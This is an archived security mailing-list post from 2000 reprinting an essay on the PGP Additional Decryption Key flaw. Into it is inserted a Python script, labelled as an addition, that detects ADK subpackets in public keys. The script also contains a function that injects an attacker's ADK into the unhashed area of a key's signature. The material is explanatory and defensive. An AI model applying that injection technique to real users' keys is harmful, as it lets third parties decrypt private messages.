Information Security News mailing list archives

Pretty Good Privacy?


From: InfoSec News <isn () C4I ORG>
Date: Thu, 31 Aug 2000 23:15:50 -0500

*********************************************************************
Ugly Mistake for Pretty Good
by Jay D. Dyson

    "If you think cryptography can solve your problem,
     then you don't understand your problem and you don't
     understand cryptography."
     -- Bruce Schneier

Pretty Good Privacy (PGP) has a long and colorful history.  From its
1991 debut by cryptographer Phil Zimmermann, PGP attracted immediate
attention.  The notion of "public key encryption for the masses"
achieved instant recognition not only from privacy advocates but also
from the National Security Agency.  Over the years, PGP stood as a
bulwark for personal privacy amidst the introduction of the U.S.
government's Clipper proposal and increasingly expansive wiretapping
legislation.

PGP's turbulent political history is matched by an equally rocky legal
one.  Disputes over PGP's use of the RSA public key algorithm and
charges of violating the U.S. International Traffic in Arms
Regulations (ITAR) continually dogged both the program and its author.
To stave off these complications, PGP formed strategic partnerships
with ViaCrypt and MIT.  Then, in December 1997, Network Associates,
Inc. (NAI) acquired PGP Inc.

        http://www.cypherspace.org/~adam/timeline/
        http://www.freedomfighter.net/crypto/pgp-history.html

PGP had finally come of age.  Its "banditware" reputation faded into
the background, and it quickly achieved legitimacy in the eyes of
corporate America.  In December of 1999, PGP even earned an export
license from its once-greatest nemesis -- the U.S. Government.
Everything seemed rosy.

However, NAI, the proud new owner of PGP, also happened to belong to
the Key Recovery Alliance (KRA), an industry group advocating
government key escrow.  Though NAI disavowed its KRA membership in
1997, it quietly resumed ties with the organization.  In keeping with
that stance, NAI also continued to build Additional Decryption Keys
(ADKs) into PGP.  ADKs, introduced as an alternative to key escrow,
were touted as a feature for businesses using PGP.  An ADK is a
corporate master key bound to a user's public key: any PGP client that
encrypts a message to the user's key is expected to encrypt it to the
master key as well.  That way, if an employee leaves the company, the
company can still decrypt that employee's files.  What could possibly
be wrong with that?

Plenty.

        http://www.fitug.de/debate/9811/msg00233.html
        http://www.cdt.org/crypto/risks98/

Shortly after ADKs were included in PGP in 1998, many in the
cryptographic community began voicing concerns about their use.  The
most ominous among them was Ralf Senderek's evaluation, which read in
part:

    "I do not know which mechanism will prevent a user's public
     key from being linked with another faked message recovery key
     without the user's consent or knowledge."

Two years later, his concern was validated.  On August 24, 2000, Ralf
Senderek discovered that version 5 and 6 PGP public keys were
vulnerable to unauthorized ADK modification.  The affected versions
honor ADK subpackets found in the unsigned (unhashed) part of a key's
self-signature, the part that no signature covers.  Thus, any third
party could circulate a tampered copy of Jane User's public key
carrying an ADK subpacket that names the tamperer's own key, and the
tampered key would still pass every signature check.  Anything a
vulnerable client encrypted to Jane's public key would then also be
encrypted to Joe Intruder's public key, effectively giving Joe access
to any and all private data meant only for Jane's eyes.

        http://senderek.de/security/key-experiments.html
        http://cryptome.org/pgp-badbug.htm
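The check a practitioner wants after reading the above, added here as an example (it is not NAI's code, Senderek's test keys, or anything from the original article): walk the OpenPGP (RFC 4880) packets of an exported public key, split each v4 signature into its hashed and unhashed subpacket areas, and report every ADK subpacket together with the area it sits in.  It assumes ADKs are signature-subpacket type 10 (the number RFC 4880 keeps as a legacy placeholder) with PGP's class/algorithm/fingerprint body, builds a constructed sample key for Jane with dummy MPIs and signature value, and includes a function that performs Joe Intruder's tampering on that sample so the detector's two outcomes can be compared.

```python
"""Report Additional Decryption Key (ADK) subpackets in an OpenPGP (RFC 4880) public
key, distinguishing the hashed area of a signature (covered by the self-signature)
from the unhashed area (rewritable by anyone without breaking the signature).
Added example; assumes ADKs use signature-subpacket type 10 with a body of class
octet, public-key algorithm octet and 20-octet fingerprint (PGP's layout)."""
import struct

ADK_SUBPACKET, SIG_PACKET, PUBKEY_PACKET, USERID_PACKET = 10, 2, 6, 13
CERTIFICATION_SIGS = (0x10, 0x11, 0x12, 0x13)     # user-ID certifications incl. self-sigs

def read_packets(data):
    """Yield (tag, body) per packet; handles old- and new-format headers."""
    i = 0
    while i < len(data):
        ctb, i = data[i], i + 1
        if ctb & 0x40:                                        # new-format header
            tag, first, i = ctb & 0x3F, data[i], i + 1
            if first < 192:
                length = first
            elif first < 224:
                length, i = ((first - 192) << 8) + data[i] + 192, i + 1
            elif first == 255:
                length, i = struct.unpack(">I", data[i:i + 4])[0], i + 4
            else:
                raise ValueError("partial body lengths not supported")
        else:                                                 # old-format header
            tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
            if ltype == 3:
                raise ValueError("indeterminate length not supported")
            n = (1, 2, 4)[ltype]
            length, i = int.from_bytes(data[i:i + n], "big"), i + n
        yield tag, data[i:i + length]
        i += length

def read_subpackets(area):
    """Yield (type, critical_bit, body) from a signature subpacket area."""
    i = 0
    while i < len(area):
        first, i = area[i], i + 1
        if first < 192:
            length = first
        elif first < 255:
            length, i = ((first - 192) << 8) + area[i] + 192, i + 1
        else:
            length, i = struct.unpack(">I", area[i:i + 4])[0], i + 4
        yield area[i] & 0x7F, bool(area[i] & 0x80), area[i + 1:i + length]
        i += length

def split_v4_signature(body):
    """Return (sigtype, hashed_area, unhashed_area, trailer) of a v4 signature body."""
    hlen = struct.unpack(">H", body[4:6])[0]
    ulen = struct.unpack(">H", body[6 + hlen:8 + hlen])[0]
    return body[1], body[6:6 + hlen], body[8 + hlen:8 + hlen + ulen], body[8 + hlen + ulen:]

def find_adks(keydata):
    """List each ADK with its area; only a 'hashed' ADK is signed, an 'unhashed' one is
    exactly what the vulnerable PGP versions honoured."""
    found = []
    for index, (tag, body) in enumerate(read_packets(keydata)):
        if tag != SIG_PACKET or body[0] != 4:
            continue                            # only v4 signatures carry subpackets
        sigtype, hashed, unhashed, _ = split_v4_signature(body)
        for area, subpackets in (("hashed", hashed), ("unhashed", unhashed)):
            for stype, critical, sbody in read_subpackets(subpackets):
                if stype == ADK_SUBPACKET:
                    found.append({"packet": index, "sigtype": sigtype, "area": area, "critical": critical,
                                  "fingerprint": sbody[2:22].hex() if len(sbody) >= 22 else None})
    return found

def packet(tag, body):                           # old-format header, two-octet length
    return bytes([0x80 | (tag << 2) | 1]) + struct.pack(">H", len(body)) + body

def subpacket(stype, body):                      # one-octet length form (< 192 octets)
    return bytes([len(body) + 1, stype]) + body

def adk_body(fpr_hex, pk_algo=1):                # class octet (not interpreted here), algo, fingerprint
    return bytes([0x00, pk_algo]) + bytes.fromhex(fpr_hex)

def inject_unhashed_adk(keydata, fpr_hex):
    """Joe Intruder's tampering: append an ADK to the UNHASHED area of every
    certification signature.  The signature still verifies, since that area is not hashed."""
    out = b""
    for tag, body in read_packets(keydata):
        if tag == SIG_PACKET and body[0] == 4 and body[1] in CERTIFICATION_SIGS:
            _, hashed, unhashed, trailer = split_v4_signature(body)
            unhashed += subpacket(ADK_SUBPACKET, adk_body(fpr_hex))
            body = body[:6] + hashed + struct.pack(">H", len(unhashed)) + unhashed + trailer
        out += packet(tag, body)
    return out

# Constructed sample: Jane's key with a legitimate corporate ADK in the hashed area.
# The MPIs and signature value are dummies; nothing here verifies signatures.
CORP_ADK, ATTACKER_ADK = "aa" * 20, "bb" * 20
_hashed = subpacket(2, b"\x00\x00\x00\x00") + subpacket(ADK_SUBPACKET, adk_body(CORP_ADK))
_unhashed = subpacket(16, b"\x01" * 8)                                  # issuer key ID
SAMPLE_KEY = (packet(PUBKEY_PACKET, b"\x04\x00\x00\x00\x00\x01\x00\x10\xff\xff\x00\x05\x11")
              + packet(USERID_PACKET, b"Jane User <jane@example.com>")
              + packet(SIG_PACKET, b"\x04\x13\x01\x02" + struct.pack(">H", len(_hashed)) + _hashed
                       + struct.pack(">H", len(_unhashed)) + _unhashed + b"\x00\x00\x00\x08\xff"))

if __name__ == "__main__":
    print(find_adks(SAMPLE_KEY), find_adks(inject_unhashed_adk(SAMPLE_KEY, ATTACKER_ADK)))
```

Run it on a binary key (for instance the output of `gpg --export`, dearmored) to see which ADKs, if any, are actually signed.  `gpg --list-packets` exposes the same distinction: subpackets covered by the signature print as `hashed subpkt`, the rest as plain `subpkt`.  A structural scan is only half the check, though: before honoring even a hashed ADK, a client must verify the self-signature that carries it and confirm the signature was made by the key it is attached to.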

As Senderek points out, the problem won't go away until all vulnerable
PGP versions are retired, since it is the sender's software that
encrypts to the ADKs, not the recipient's: Jane gains nothing by
upgrading her own copy while her correspondents keep honoring the
tampered key.  Keep in mind that the vast majority of NAI PGP users
also use programs such as MS Outlook (already demonstrably insecure,
considering the "Melissa" and "I Love You" variants that brought such
systems to their knees).  Supposing that they would not detect an
unauthorized ADK attack if they experienced one requires no suspension
of disbelief.

The fallout from this revelation was swift.  Amid the hue and cry
over Senderek's report came wholesale PGP keyserver cleansing efforts
and a sudden groundswell of people speaking out against PGP's use,
favoring instead other public key cryptographic programs such as GNU
Privacy Guard (GnuPG).  Even seasoned users of the older versions of
PGP questioned its continued use.

        "[They] became so preoccupied with whether or not they
        *could* that they didn't stop to think if they *should*."
        -- Ian Malcolm (from Jurassic Park)

PGP's philosophy and design are sound; however, in its rush to
implement new "value-added" features, NAI sacrificed the core security
on which every public key cryptosystem relies: the integrity of the
public key itself.  In doing so, NAI has also risked the hard-won
confidence PGP has cultivated since it was first distributed across
the Internet.

Many others, including myself, have long since abandoned use of any
cryptographic system that does not make freely available its source
code. This latest incident only serves to galvanize my stance.  While
I will continue using NAI's version of PGP as my customers may
require, I will only trust the version that I have personally reviewed
and compiled.  This may seem backward to some, but it is essential to
me.  In looking back on the events of this past week, I have to concur
with Senderek's latest comment:

        "This is not a bug, this is a scandal..."


Resources

Flaw found in PGP code
Defect allows attacker to decrypt personal data
http://www2.itworld.com/cma/ett_article_frame/0,2848,1_2310,00.html

Attacking Linux
To stop an attacker, think like a cracker
http://www.linuxworld.com/linuxworld/lw-2000-08/lw-08-expo00-hacking.html

RSA upgrading its Keon PKI security software
http://www2.itworld.com/cma/ett_article_frame/0,2848,1_2347,00.html

Freeware encryption as alternative to PGP
GnuPG exempt from government export restrictions
http://www.linuxworld.com/linuxworld/lw-1999-01/lw-01-gnupg.html

************************************************************************
************************************************************************
About the author
----------------

Jay D. Dyson is a senior security consultant for OneSecure, Inc., a
company specializing in managed network and host security services.
He also serves as a part-time consultant on security issues for the
National Aeronautics and Space Administration in Pasadena.  He has
been a system administrator for over 15 years on various platforms.
*********************************************************************


http://www.itworld.com

ISN is hosted by SecurityFocus.com